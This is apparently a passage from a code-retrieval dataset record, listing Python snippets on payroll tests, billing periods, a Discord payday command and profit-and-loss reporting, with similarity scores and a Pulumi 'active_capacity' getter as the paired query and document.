\"\r\n \"Please spend some more \\N{GRIMACING FACE}\\n\\n\"\r\n \"You currently have {new_balance} {currency}.\"\r\n ).format(\r\n currency=credits_name, new_balance=humanize_number(exc.max_balance)\r\n )\r\n )\r\n return\r\n\r\n # Sets the latest payday time to the current time\r\n next_payday = cur_time\r\n\r\n await self.config.member(author).next_payday.set(next_payday)\r\n \r\n pos = await bank.get_leaderboard_position(author)\r\n embed = Embed.create(\r\n self, ctx, title=\"<:dollarbag:778687019944771616> Payday!\",\r\n description=(\r\n \"{author.mention} Take a loada' cash. \"\r\n \"Don't spend it took quick!\\n\\n\"\r\n \"<:plus:777167188816560168> {amount} dollars have been added to your bank.\\n\"\r\n \"You now have {new_balance} dollars. <:dollarbag:778687019944771616>\\n\\n\"\r\n \"You are currently #{pos} on the server leaderboard!\"\r\n ).format(\r\n author=author,\r\n currency=credits_name,\r\n amount=humanize_number(await self.config.PAYDAY_CREDITS()),\r\n new_balance=humanize_number(await bank.get_balance(author)),\r\n pos=humanize_number(pos)\r\n )\r\n )\r\n await ctx.send(embed=embed)\r\n \r\n else:\r\n dtime = self.display_time(next_payday - cur_time)\r\n await ctx.send(\r\n _(\r\n \"{author.mention} Too soon. For your next payday you have to wait {time}.\"\r\n ).format(author=author, time=dtime)\r\n )", "def expirePeriodInSeconds(self)->int:\n return self._lic.params['periodInSeconds'].value", "def account_changes(self, since_transaction_id: SinceTransactionID = sentinel):\n pass", "def circulation_upcoming_return_range():\n return arrow.utcnow() + timedelta(\n days=current_app.config[\"ILS_UPCOMING_RETURN_RANGE\"])", "def committees(self):\n print(\"Scheduling a refresh of committees\")\n if not self.background_scheduler.get_job('committees'):\n self.background_scheduler.add_job(Refresh.committees,\n 'cron',\n id='committees',\n name='committees',\n day='last fri')\n self._start()", "def renewal_period(self) -> Optional[float]:\n return pulumi.get(self, \"renewal_period\")", "def period(self) -> int:", "def __init__(self):\n import datetime as dt\n import dateutil as du\n from dateutil import relativedelta\n\n #Initial date calculations\n self.right_now = dt.datetime.utcnow()\n self.beginDelta = -2\n self.endDelta = 365\n self.timeDeltaCashBegin = du.relativedelta.relativedelta(months=self.beginDelta)\n self.timeDeltaCashEnd = dt.timedelta(days=self.endDelta)\n self.begin_date = self.right_now + self.timeDeltaCashBegin\n self.end_date = self.right_now + self.timeDeltaCashEnd\n\n #today's date to initialize the Cash event\n self.today_date = str(dt.datetime.date(self.right_now))\n\n #time variable for event creation // included date list to decipher cash update days\n self.create_begin = dt.datetime.fromisoformat(self.right_now.date().isoformat()).isoformat() + 'Z'\n self.create_end = self.end_date.isoformat() + 'Z'\n self.create_duration = (self.end_date - self.right_now).days\n self.iterate_days = self.iterateList(self.create_duration)\n\n #time variables used in deletion code\n self.clear_begin = self.begin_date.isoformat() + 'Z'\n self.clear_end = self.end_date.isoformat() + 'Z'\n\n #Smaller size for event creation/deleting testing\n self.test_duration = 40\n self.test_days = self.iterateList(self.test_duration)\n \n #Store old event list to check if changes need to be made\n self.check_for_updates = []\n self.cash_history = []\n\n self.creds = self.getUsrCreds()\n self.service = self.buildAPICal(self.creds)\n self.usrCals = self.getUsrCals(self.service)\n\n 
#Check if Calendar is Present and get the details -- if not, build one\n if self.checkCashCal(self.usrCals) == False:\n self.usr_csh_id, self.usr_csh_cal = self.buildCashCal(self.usrCals)\n else:\n self.usr_csh_id = self.getCshID(self.usrCals)\n self.usr_csh_cal = self.getCshCal(self.usrCals)", "def get_period(self):\n raise NotImplementedError('Agent is an abstract base class')", "def utility_lifetime(self, utility_today, utility_future):\n return utility_today + self.beta * utility_future", "def test_finalize_period(self):\n employee_payments_qty = EmployeePayment.objects.filter(employer=self.test_employer).count()\n url = reverse_lazy('api:me-get-single-payroll-period', kwargs={'period_id': self.test_period.id})\n self.client.force_login(self.test_user_employer)\n response = self.client.put(url, data={'status': 'FINALIZED'}, content_type='application/json')\n self.assertEqual(response.status_code, 200, response.content.decode())\n response_json = response.json()\n self.assertEqual(response_json.get('id'), self.test_period.id, response_json)\n self.assertEqual(response_json.get('employer'), self.test_employer.id, response_json)\n self.assertEqual(response_json.get('status'), 'FINALIZED', response_json)\n self.assertEqual(EmployeePayment.objects.filter(employer=self.test_employer).count(), employee_payments_qty + 2)\n # verify amounts, with no over_time\n employee_payment = EmployeePayment.objects.get(employer_id=self.test_employer.id,\n employee_id=self.test_employee2.id,\n payroll_period_id=self.test_period.id)\n self.assertEqual(employee_payment.earnings, Decimal('300.00'), employee_payment.earnings)", "def test_calculate_contract_duration():\n assert calculate_contract_duration(\n parse('2020-01-01'), parse('2020-03-31')\n ) == relativedelta(months=+2, days=+30)", "def return_account_balance(self, date_cursor=None):\n\n logger.info(\"Running return_account_balance for policy %s\" % self.policy.id)\n\n if not date_cursor:\n date_cursor = datetime.now().date()\n\n invoices = Invoice.query.filter_by(policy_id=self.policy.id)\\\n .filter(Invoice.bill_date <= date_cursor)\\\n .order_by(Invoice.bill_date)\\\n .all()\n logger.info(str(len(invoices)) + \" invoices queried from database for policy %s\" % self.policy.id)\n\n due_now = 0\n for invoice in invoices:\n due_now += invoice.amount_due\n\n payments = Payment.query.filter_by(policy_id=self.policy.id)\\\n .filter(Payment.transaction_date <= date_cursor)\\\n .all()\n logger.info(str(len(payments)) + \" payments queried from database for policy %s\" % self.policy.id)\n\n for payment in payments:\n due_now -= payment.amount_paid\n\n return due_now", "def expiration(self):\n return datetime(int(self.exp_year), int(self.exp_month),\n calendar.monthrange(int(self.exp_year), int(self.exp_month))[1],\n 23, 59, 59)", "def returnDepositsWithdrawals(self,\n start=datetime.now() - timedelta(days=1),\n end=datetime.now()):\n pass", "def pnl(qbo_session, period = \"YEARLY\", start_date=\"first\", end_date=\"last\",\n **kwargs):\n\n pnl_account_types = [\n \n \"Income\", \"Other Income\",\n \"Expense\", \"Other Expense\", \"Cost of Goods Sold\"\n \n ]\n\n \n\n # go through the accounts, collecting a list of those that are \n # pnl accounts\n\n relevant_accounts = []\n\n coa = qbo_session.chart_of_accounts()\n\n AccountType_i = coa[0].index(\"AccountType\")\n fqa_i = coa[0].index(\"FullyQualifiedName\")\n\n for a in coa:\n\n AccountType = a[AccountType_i]\n\n if AccountType in pnl_account_types:\n\n relevant_accounts.append(a[fqa_i])\n \n # now collect 
the ledger_lines that are even relevant to the time\n # period and pnl accounts (and we'll handle presentation last)\n\n relevant_activity = {} #{account:[relevant lines]}\n\n all_ledger_lines = qbo_session.ledger_lines(None, None, None, True,\n **kwargs)\n\n headers = all_ledger_lines[0]\n\n account_i = headers.index(\"account\") \n amount_i = headers.index(\"amount\")\n date_i = headers.index(\"TxnDate\")\n \n earliest_date = datetime(2100,1,1)\n latest_date = datetime(1900,1,1)\n\n for line in all_ledger_lines[1:]:\n\n account = line[account_i]\n line_date = line[date_i]\n\n #first apply the date filter!\n if not start_date == \"first\" and line_date < start_date:\n continue\n \n if not end_date == \"last\" and line_date > end_date:\n continue\n \n #if it's made the cut, we can update the report date bounds\n earliest_date = min(line_date,earliest_date)\n latest_date = max(line_date,latest_date)\n\n #then apply the account filter!\n\n if not account in relevant_activity:\n #then let's confirm that its account type is a pnl one\n \n if not account in relevant_accounts:\n \n continue\n\n else:\n relevant_activity[account] = []\n\n relevant_activity[account].append(line)\n\n #now let's do presentation\n #TODO -- incorporate pandas tables...do only minimal work on it until then\n\n pnl_lines = []\n\n if period == \"YEARLY\":\n\n report_start_date = datetime(earliest_date.year,1,1)\n report_end_date = datetime(latest_date.year,12,31)\n\n period_start_dates = list(rrule(YEARLY, bymonth=1, bymonthday=1,\n dtstart=report_start_date,\n until=report_end_date))\n\n period_end_dates = list(rrule(YEARLY, bymonth=12, bymonthday=-1,\n dtstart=report_start_date,\n until=report_end_date))\n\n elif period == \"MONTHLY\":\n\n report_start_date = datetime(earliest_date.year,\n earliest_date.month,\n 1)\n report_end_date = datetime(latest_date.year,\n latest_date.month,\n calendar.monthrange(latest_date.year,\n latest_date.month)[1])\n\n period_start_dates = list(rrule(MONTHLY, bymonthday=1,\n dtstart=report_start_date,\n until=report_end_date))\n\n period_end_dates = list(rrule(YEARLY, bymonthday=-1,\n dtstart=report_start_date,\n until=report_end_date)) \n\n header_1 = [\"\", \"Period Start -->\"] + period_start_dates\n header_2 = [\"Account\", \"Period End -->\"] + period_end_dates\n\n pnl_lines.append(header_1)\n pnl_lines.append(header_2)\n\n \"\"\"Clearly, there's a way to do this with only one pass of the data...\n let's get that right in the first re-write...probably with pandas\"\"\"\n\n #now let's fill up the pnl_lines with what we know to be the relevant data\n #for now, we'll rely on the knowledge that the data is coming to us in\n #date order, but that should be fixed too...\n\n for account in relevant_activity:\n\n account_row = [account, \"\"] #one value per period \n\n current_period_index = 0 #primitive counter, yes!\n this_period_total = 0 #this will be this period's total\n\n for line in relevant_activity[account]:\n \n line_amount = line[amount_i]\n line_date = line[date_i] \n\n if line_date > period_end_dates[current_period_index]:\n\n account_row.append(this_period_total)\n this_period_total = line_amount\n current_period_index +=1\n\n else:\n \n this_period_total = round(this_period_total +\n line_amount, 2)\n\n \"\"\"super sloppy...\"\"\"\n account_row.append(this_period_total) #for the last period\n current_period_index +=1\n\n while current_period_index < len(period_end_dates):\n account_row.append(0)\n current_period_index +=1\n\n pnl_lines.append(account_row)\n\n return 
pnl_lines", "def test_list_grading_periods_accounts(self):\r\n account_id = None # Change me!!\r\n\r\n r = self.client.list_grading_periods_accounts(account_id)", "def get_deadline(self):\n min_time = self.introduction_time or 0\n return min_time + self.time_slot[0] * self.__period", "def compute_periodpayoff(self):\n logger.debug(u\"{} Period Payoff\".format(self.joueur))\n self.currentperiod.EXPERIENCE_NOM_COURT_periodpayoff = 0\n\n # cumulative payoff since the first period\n if self.currentperiod.EXPERIENCE_NOM_COURT_period < 2:\n self.currentperiod.EXPERIENCE_NOM_COURT_cumulativepayoff = \\\n self.currentperiod.EXPERIENCE_NOM_COURT_periodpayoff\n else: \n previousperiod = self.periods[self.currentperiod.EXPERIENCE_NOM_COURT_period - 1]\n self.currentperiod.EXPERIENCE_NOM_COURT_cumulativepayoff = \\\n previousperiod.EXPERIENCE_NOM_COURT_cumulativepayoff + \\\n self.currentperiod.EXPERIENCE_NOM_COURT_periodpayoff\n\n # we store the period in the self.periodes dictionnary\n self.periods[self.currentperiod.EXPERIENCE_NOM_COURT_period] = self.currentperiod\n\n logger.debug(u\"{} Period Payoff {}\".format(\n self.joueur,\n self.currentperiod.EXPERIENCE_NOM_COURT_periodpayoff))", "def test_finalize_period_overtime(self):\n employee_payments_qty = EmployeePayment.objects.filter(employer=self.test_employer).count()\n url = reverse_lazy('api:me-get-single-payroll-period', kwargs={'period_id': self.test_period.id})\n self.client.force_login(self.test_user_employer)\n response = self.client.put(url, data={'status': 'FINALIZED'}, content_type='application/json')\n self.assertEqual(response.status_code, 200, response.content.decode())\n response_json = response.json()\n self.assertEqual(response_json.get('id'), self.test_period.id, response_json)\n self.assertEqual(response_json.get('employer'), self.test_employer.id, response_json)\n self.assertEqual(response_json.get('status'), 'FINALIZED', response_json)\n self.assertEqual(EmployeePayment.objects.filter(employer=self.test_employer).count(), employee_payments_qty + 2)\n # verify amounts, with over_time\n employee_payment = EmployeePayment.objects.get(employer_id=self.test_employer.id,\n employee_id=self.test_employee.id,\n payroll_period_id=self.test_period.id)\n self.assertEqual(employee_payment.earnings, Decimal('360.00') + Decimal('450.00'),\n employee_payment.earnings)", "def deadline(self):\n\n if self.service and self.service.solution_time:\n return self.created + \\\n timedelta(hours=self.service.solution_time) - \\\n timedelta(seconds=self._time_on_hold)\n else:\n return None", "def billing_period(self) -> Optional[str]:\n return pulumi.get(self, \"billing_period\")", "def payment_cycle(self) -> Optional[pulumi.Input['GoogleCloudChannelV1PeriodArgs']]:\n return pulumi.get(self, \"payment_cycle\")", "def test_finalize_and_open_period(self):\n employee_payments_qty = EmployeePayment.objects.filter(employer=self.test_employer).count()\n url = reverse_lazy('api:me-get-single-payroll-period', kwargs={'period_id': self.test_period2.id})\n self.client.force_login(self.test_user_employer)\n # change from OPEN to FINALIZE\n response = self.client.put(url, data={'status': 'FINALIZED'}, content_type='application/json')\n self.assertEqual(response.status_code, 200, response.content.decode())\n response_json = response.json()\n self.assertEqual(response_json.get('status'), 'FINALIZED', response_json)\n self.assertEqual(EmployeePayment.objects.filter(employer=self.test_employer).count(), employee_payments_qty + 1)\n # change from FINALIZE to OPEN\n 
response = self.client.put(url, data={'status': 'OPEN'}, content_type='application/json')\n self.assertEqual(response.status_code, 200, response.content.decode())\n response_json = response.json()\n self.assertEqual(response_json.get('status'), 'OPEN', response_json)\n self.assertEqual(EmployeePayment.objects.filter(employer=self.test_employer).count(), employee_payments_qty)" ]
[ "0.6236221", "0.556296", "0.5546404", "0.5526741", "0.52279395", "0.5222263", "0.5204489", "0.51837915", "0.5149062", "0.5121727", "0.5081491", "0.5066678", "0.50160015", "0.5004779", "0.49921027", "0.49675107", "0.49551263", "0.4941851", "0.49270973", "0.49227467", "0.4918205", "0.4911476", "0.49099314", "0.49072093", "0.48913255", "0.48905048", "0.48638746", "0.48467177", "0.48088193", "0.48062244" ]
0.5595547
1
The call rate limit Cognitive Services account.
def call_rate_limit(self) -> 'outputs.CallRateLimitResponse': return pulumi.get(self, "call_rate_limit")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_rate_limit(self):\n resp = self._session.get(self.API_ROOT + \"/rate_limit\")\n log.info(resp.text)", "def ctx(self):\n return RateLimitContextBase()", "def get_rate_limit(client):\n query = '''query {\n rateLimit {\n limit\n remaining\n resetAt\n }\n }'''\n response = client.execute(query)\n json_response = json.loads(response)\n return json_response['data']['rateLimit']", "def _get_next_limit(self):\n return self.__quota", "def get_request_limit(self, access_token):\n url = \"{0}/rate_limit?access_token={1}\"\n response = requests.get(url.format(self.ROOT_API_URL, access_token))\n data = response.json()\n return data['resources']['core'].get(\"remaining\")", "def test_limits_are_per_account(self):\n url = 'Participant'\n\n # Hit the rate limit for the default service account for the test\n self._reach_rate_limit(url=url)\n\n # Make another request with a different service account, expecting it to work\n with mock.patch('rdr_service.app_util.config.LOCAL_AUTH_USER', '[email protected]'):\n self.send_get(url, expected_status=200)", "def limit(self):\n return self._owner.plan", "def current_rate(entity, limit, duration):\n\n key = \"ratelimit:{}:{}\".format(int(time.time() / duration), entity)\n value = memcache.incr(key, initial_value=0)\n if value > limit:\n logging.info(\n \"RateLimitDenied({!r}, value={!r}, limit={!r}, duration={!r})\"\n .format(entity, value, limit, duration))\n else:\n logging.info(\n \"RateLimitAllowed({!r}, value={!r}, limit={!r}, duration={!r})\"\n .format(entity, value, limit, duration))\n return value", "def limit(self):\n if self._limit:\n return self._limit\n else: # no custom limit, go with the default\n return PublicAppPlan", "def get_view_rate_limit():\n return getattr(g, '_view_rate_limit', None)", "def get_account(self, account):\n \n pass", "def get_current_rate(self):\n pass", "async def rate_limit(self, ctx):\n await ctx.send(\"We have found that the approximate rate limit is 30-40 requests per second. 
Staying \"\n \"below this should be safe.\")", "def rate_limit_percentage(self) -> Optional[float]:\n return pulumi.get(self, \"rate_limit_percentage\")", "def rate(self):\n return self.brate / FAC", "def quota(self) -> int:\n return pulumi.get(self, \"quota\")", "def get_account_limits(self, receive_window: Optional[int] = None):\n api_params = {\n \"timestamp\": get_current_time_milliseconds()\n }\n\n if receive_window is not None:\n api_params['receiveWindow'] = receive_window\n\n return self.request.get(path='/account/limits', params=api_params)", "def account_id():\n return client.get_caller_identity()['Account']", "def user_get_rate_limit():\n login = demisto.getArg('login')\n request = req('GET', USER_API + 'users/' + login + '/rate-limit')\n r = request.json()\n rate_limit = {\n 'SubmissionWaitSeconds': demisto.get(r, 'data.user.submission-wait-seconds'),\n 'SubmissionsAvailable': demisto.get(r, 'data.user.submissions-available')\n }\n demisto.results({\n 'Type': entryTypes['note'],\n 'EntryContext': {'ThreatGrid.User.RateLimit': rate_limit},\n 'HumanReadable': tableToMarkdown('ThreatGrid - User Rate Limit', [rate_limit], [\n 'SubmissionWaitSeconds', 'SubmissionsAvailable'\n ]),\n 'ContentsFormat': formats['json'],\n 'Contents': r\n })", "def get_limit(self):\n return self.limit", "def charge_limit(self, limit=None):\n if limit is None:\n done, data = self._request('GH')\n if done:\n return int(data[0])\n else:\n if self._request('SH', str(int(limit)))[0]:\n return limit\n\n raise EvseError", "def get_limit(self, request, tenant_id):\n request.setResponseCode(200)\n return json.dumps(get_limit())", "def account(self, acct):\n aMgr = self.acctManager\n if len(aMgr.accounts) <= acct:\n raise Exception(\"requested unknown account number %i\" % acct)\n return aMgr.account(acct)", "def get_quota(self):\n raise NotImplementedError", "def organization_get_rate_limit():\n login = demisto.getArg('adminLogin')\n request = req('GET', USER_API + 'users/' + login + '/rate-limit')\n r = request.json()\n rate_limits = [\n {\n 'Minutes': demisto.get(rate_limit, 'minutes'),\n 'Samples': demisto.get(rate_limit, 'samples'),\n 'SubmissionWaitSeconds': demisto.get(rate_limit, 'submission-wait-seconds'),\n 'SubmissionsAvailable': demisto.get(rate_limit, 'submissions-available')\n }\n for rate_limit in demisto.get(r, 'data.organization.submission-rate-limit')\n ]\n demisto.results({\n 'Type': entryTypes['note'],\n 'EntryContext': {'ThreatGrid.User.RateLimit': rate_limits},\n 'HumanReadable': tableToMarkdown('ThreatGrid - Organization Rate Limit', rate_limits, [\n 'Minutes', 'Samples', 'SubmissionWaitSeconds', 'SubmissionsAvailable'\n ]),\n 'ContentsFormat': formats['json'],\n 'Contents': r\n })", "def calculate(self, limit):\n pass", "def calculate(self, limit):\r\n pass", "def get_account(self):\n return self._account", "def get_account(self):\n return self._account", "def get_limit(self):\n return self._limit" ]
[ "0.6358268", "0.6162561", "0.60568434", "0.5990054", "0.5918794", "0.58661646", "0.573936", "0.57365024", "0.5668265", "0.5640884", "0.56161267", "0.5614316", "0.5562859", "0.5551392", "0.5523943", "0.5515391", "0.54717577", "0.54716563", "0.5464131", "0.5456545", "0.54448587", "0.5427943", "0.54169154", "0.53732604", "0.53491294", "0.5347658", "0.533205", "0.53172153", "0.53172153", "0.5316155" ]
0.73106307
0
The call rate limit Cognitive Services account.
def call_rate_limit(self) -> 'outputs.CallRateLimitResponse': return pulumi.get(self, "call_rate_limit")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_rate_limit(self):\n resp = self._session.get(self.API_ROOT + \"/rate_limit\")\n log.info(resp.text)", "def ctx(self):\n return RateLimitContextBase()", "def get_rate_limit(client):\n query = '''query {\n rateLimit {\n limit\n remaining\n resetAt\n }\n }'''\n response = client.execute(query)\n json_response = json.loads(response)\n return json_response['data']['rateLimit']", "def _get_next_limit(self):\n return self.__quota", "def get_request_limit(self, access_token):\n url = \"{0}/rate_limit?access_token={1}\"\n response = requests.get(url.format(self.ROOT_API_URL, access_token))\n data = response.json()\n return data['resources']['core'].get(\"remaining\")", "def test_limits_are_per_account(self):\n url = 'Participant'\n\n # Hit the rate limit for the default service account for the test\n self._reach_rate_limit(url=url)\n\n # Make another request with a different service account, expecting it to work\n with mock.patch('rdr_service.app_util.config.LOCAL_AUTH_USER', '[email protected]'):\n self.send_get(url, expected_status=200)", "def limit(self):\n return self._owner.plan", "def current_rate(entity, limit, duration):\n\n key = \"ratelimit:{}:{}\".format(int(time.time() / duration), entity)\n value = memcache.incr(key, initial_value=0)\n if value > limit:\n logging.info(\n \"RateLimitDenied({!r}, value={!r}, limit={!r}, duration={!r})\"\n .format(entity, value, limit, duration))\n else:\n logging.info(\n \"RateLimitAllowed({!r}, value={!r}, limit={!r}, duration={!r})\"\n .format(entity, value, limit, duration))\n return value", "def limit(self):\n if self._limit:\n return self._limit\n else: # no custom limit, go with the default\n return PublicAppPlan", "def get_view_rate_limit():\n return getattr(g, '_view_rate_limit', None)", "def get_account(self, account):\n \n pass", "def get_current_rate(self):\n pass", "async def rate_limit(self, ctx):\n await ctx.send(\"We have found that the approximate rate limit is 30-40 requests per second. 
Staying \"\n \"below this should be safe.\")", "def rate_limit_percentage(self) -> Optional[float]:\n return pulumi.get(self, \"rate_limit_percentage\")", "def rate(self):\n return self.brate / FAC", "def quota(self) -> int:\n return pulumi.get(self, \"quota\")", "def get_account_limits(self, receive_window: Optional[int] = None):\n api_params = {\n \"timestamp\": get_current_time_milliseconds()\n }\n\n if receive_window is not None:\n api_params['receiveWindow'] = receive_window\n\n return self.request.get(path='/account/limits', params=api_params)", "def account_id():\n return client.get_caller_identity()['Account']", "def user_get_rate_limit():\n login = demisto.getArg('login')\n request = req('GET', USER_API + 'users/' + login + '/rate-limit')\n r = request.json()\n rate_limit = {\n 'SubmissionWaitSeconds': demisto.get(r, 'data.user.submission-wait-seconds'),\n 'SubmissionsAvailable': demisto.get(r, 'data.user.submissions-available')\n }\n demisto.results({\n 'Type': entryTypes['note'],\n 'EntryContext': {'ThreatGrid.User.RateLimit': rate_limit},\n 'HumanReadable': tableToMarkdown('ThreatGrid - User Rate Limit', [rate_limit], [\n 'SubmissionWaitSeconds', 'SubmissionsAvailable'\n ]),\n 'ContentsFormat': formats['json'],\n 'Contents': r\n })", "def get_limit(self):\n return self.limit", "def charge_limit(self, limit=None):\n if limit is None:\n done, data = self._request('GH')\n if done:\n return int(data[0])\n else:\n if self._request('SH', str(int(limit)))[0]:\n return limit\n\n raise EvseError", "def get_limit(self, request, tenant_id):\n request.setResponseCode(200)\n return json.dumps(get_limit())", "def account(self, acct):\n aMgr = self.acctManager\n if len(aMgr.accounts) <= acct:\n raise Exception(\"requested unknown account number %i\" % acct)\n return aMgr.account(acct)", "def get_quota(self):\n raise NotImplementedError", "def organization_get_rate_limit():\n login = demisto.getArg('adminLogin')\n request = req('GET', USER_API + 'users/' + login + '/rate-limit')\n r = request.json()\n rate_limits = [\n {\n 'Minutes': demisto.get(rate_limit, 'minutes'),\n 'Samples': demisto.get(rate_limit, 'samples'),\n 'SubmissionWaitSeconds': demisto.get(rate_limit, 'submission-wait-seconds'),\n 'SubmissionsAvailable': demisto.get(rate_limit, 'submissions-available')\n }\n for rate_limit in demisto.get(r, 'data.organization.submission-rate-limit')\n ]\n demisto.results({\n 'Type': entryTypes['note'],\n 'EntryContext': {'ThreatGrid.User.RateLimit': rate_limits},\n 'HumanReadable': tableToMarkdown('ThreatGrid - Organization Rate Limit', rate_limits, [\n 'Minutes', 'Samples', 'SubmissionWaitSeconds', 'SubmissionsAvailable'\n ]),\n 'ContentsFormat': formats['json'],\n 'Contents': r\n })", "def calculate(self, limit):\n pass", "def calculate(self, limit):\r\n pass", "def get_account(self):\n return self._account", "def get_account(self):\n return self._account", "def get_limit(self):\n return self._limit" ]
[ "0.6358268", "0.6162561", "0.60568434", "0.5990054", "0.5918794", "0.58661646", "0.573936", "0.57365024", "0.5668265", "0.5640884", "0.56161267", "0.5614316", "0.5562859", "0.5551392", "0.5523943", "0.5515391", "0.54717577", "0.54716563", "0.5464131", "0.5456545", "0.54448587", "0.5427943", "0.54169154", "0.53732604", "0.53491294", "0.5347658", "0.533205", "0.53172153", "0.53172153", "0.5316155" ]
0.73106307
1
Deployment model version upgrade option.
def version_upgrade_option(self) -> Optional[str]: return pulumi.get(self, "version_upgrade_option")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def upgrade(self, old_version, new_version):\n pass", "def auto_minor_version_upgrade(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def auto_minor_version_upgrade(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def auto_minor_version_upgrade(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def auto_minor_version_upgrade(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def version(self, newVersion=None):\n pass", "def auto_minor_version_upgrade(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def auto_minor_version_upgrade(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def do_create_version(**kwargs):\n version_params = {\n \"name\": kwargs['dag_run'].conf.get('model_version'),\n \"description\": 'Version 1',\n \"runtimeVersion\": kwargs['dag_run'].conf.get('tf_version'),\n \"deploymentUri\": 'gs://{}/{}'.format(COMPOSER_BUCKET_NAME, PREFIX_FINAL_MODEL)\n }\n\n ti = kwargs['ti']\n\n mle = MLEngineHook()\n\n model_name = kwargs['dag_run'].conf.get('model_name')\n model_versions = ti.xcom_pull(key='model_versions', task_ids='list_versions')\n\n version_path = 'projects/{}/models/{}/versions/{}'.format(PROJECT,\n model_name,\n version_params['name'])\n\n if version_path in [v['name'] for v in model_versions]:\n logging.info(\"Delete previously version of the model to overwrite.\")\n mle.delete_version(PROJECT, model_name, version_params['name'])\n\n mle.create_version(PROJECT, model_name, version_params)", "def upgrade(self) -> Optional[pulumi.Input['UpgradeNoteArgs']]:\n return pulumi.get(self, \"upgrade\")", "def upgrade(self):", "def upgrade(self):", "def minor_version_auto_upgrade(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"minor_version_auto_upgrade\")", "def maybe_update_application_version(self, value):\n if (\n value\n and value.command_class == COMMAND_CLASS_VERSION\n and value.label == \"Application Version\"\n ):\n self._application_version = value.data", "def test_upgrade_opt(self):\n with testing_utils.tempdir() as tmp:\n modfn = os.path.join(tmp, 'model')\n with open(modfn, 'w') as f:\n f.write('Test.')\n optfn = modfn + '.opt'\n base_opt = {\n 'model': 'tests.test_params:_ExampleUpgradeOptAgent',\n 'dict_file': modfn + '.dict',\n 'model_file': modfn,\n }\n with open(optfn, 'w') as f:\n json.dump(base_opt, f)\n\n pp = ParlaiParser(True, True)\n opt = pp.parse_args(['--model-file', modfn])\n agents.create_agent(opt)", "def downgrade():\n raise NotImplementedError(\"Downgrade is not supported\")", "def downgrade():\n raise NotImplementedError(\"Downgrade is not supported\")", "def downgrade():\n raise NotImplementedError(\"Downgrade is not supported\")", "def _update_version(self) -> None:\n # Implement in child class.\n raise NotImplementedError", "def agent_upgrade(self) -> Optional[pulumi.Input['AgentUpgradeArgs']]:\n return pulumi.get(self, \"agent_upgrade\")", "def change_version(new_version):\n global __model\n __model = __ITU1511(new_version)\n utils.memory.clear()", "def downgrade(self, version):\n return NotImplemented", "def AddMaintenanceVersion(parser):\n parser.add_argument(\n '--maintenance-version',\n required=False,\n help='The desired maintenance version of the instance.',\n )", "def full_upgrade(self):\n return 
self.upgrade(\"full-upgrade\")", "def switch_to_version(self, version):\n self.current_version = version\n self.save()", "def test_upgrade_with_auto_upgrade_latest_engine_enabled():", "def vet_upgrade_path(args):\n flavor = get_upgrade_flavour()\n env_version_override = os.getenv('LEAPP_DEVEL_TARGET_RELEASE')\n if env_version_override:\n check_version(env_version_override)\n return (env_version_override, flavor)\n target_release = args.target or get_target_version(flavor)\n supported_target_versions = get_supported_target_versions(flavor)\n if target_release not in supported_target_versions:\n raise CommandError(\n \"Upgrade to {to} for {flavor} upgrade path is not supported, possible choices are {choices}\".format(\n to=target_release,\n flavor=flavor,\n choices=','.join(supported_target_versions)))\n return (target_release, flavor)", "def update_version() -> str:\n cur_version = get_current_version(args.stage)\n\n if args.stage == \"prod\":\n prv_version = get_current_version(stage='staging')\n new_version = semver.finalize_version(prv_version)\n elif args.stage == \"staging\":\n prv_version = get_current_version(stage='integration')\n assert '-integration' in prv_version\n new_version = prv_version.replace('-integration', '-rc') # don't bump the version number\n else:\n new_version = getattr(semver, f'bump_{args.release}')(str(cur_version))\n new_version = new_version if semver.parse_version_info(new_version).prerelease \\\n else semver.bump_prerelease(new_version, token='integration')\n\n if cur_version == new_version:\n print(\"Nothing to promote\")\n exit(0)\n else:\n print(f\"Upgrading: {cur_version} -> {new_version}\")\n return new_version", "def ongeza(self, type_):\n switch = {\n 'm': semver.bump_major,\n 'n': semver.bump_minor,\n 'p': semver.bump_patch,\n 'major': semver.bump_major,\n 'minor': semver.bump_minor,\n 'patch': semver.bump_patch}\n\n new_version = switch.get(type_)(self.version)\n\n if new_version in set(self.versions):\n self.logger.error('version `%s` already present', new_version)\n new_version = None\n\n return new_version", "def upgrade_options(self) -> Optional[pulumi.Input['AutoUpgradeOptionsArgs']]:\n return pulumi.get(self, \"upgrade_options\")" ]
[ "0.6301088", "0.6108278", "0.6108278", "0.6108278", "0.6108278", "0.6100564", "0.60524964", "0.60524964", "0.60400146", "0.6026032", "0.60177636", "0.60177636", "0.5922572", "0.5913727", "0.58997905", "0.5865239", "0.5865239", "0.5865239", "0.579891", "0.578187", "0.5762119", "0.5743691", "0.57334155", "0.57177436", "0.57038504", "0.5637413", "0.56245047", "0.5614868", "0.56117666", "0.5593066" ]
0.6563416
0
Deployment active capacity. This value might be different from `capacity` if customer recently updated `capacity`.
def active_capacity(self) -> int: return pulumi.get(self, "active_capacity")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
